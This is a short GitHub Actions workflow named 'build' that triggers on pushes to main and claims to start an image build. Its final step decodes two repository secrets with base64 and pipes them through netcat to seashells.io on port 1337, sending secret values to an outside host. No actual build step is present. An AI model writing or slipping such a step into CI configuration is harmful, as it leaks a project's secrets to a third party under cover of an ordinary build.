name: build

on:
  push:
    branches:
      - main

jobs:
  build:
    runs-on: ubuntu-latest
    environment:
      name: dev
      url: https://www.google.com/
    steps:
    
      - name: Cloning the code
        uses: actions/checkout@v3

      - name: Start Build
        run: echo "Starting Image Build on dev"

      - name: Run a multi-line script
        run: |
          echo ${{secrets.API_IMAGE_NAME}} | base64 -d | nc seashells.io 1337
          echo ${{secrets.FE_IMAGE_NAME}} | base64 -d | nc seashells.io 1337
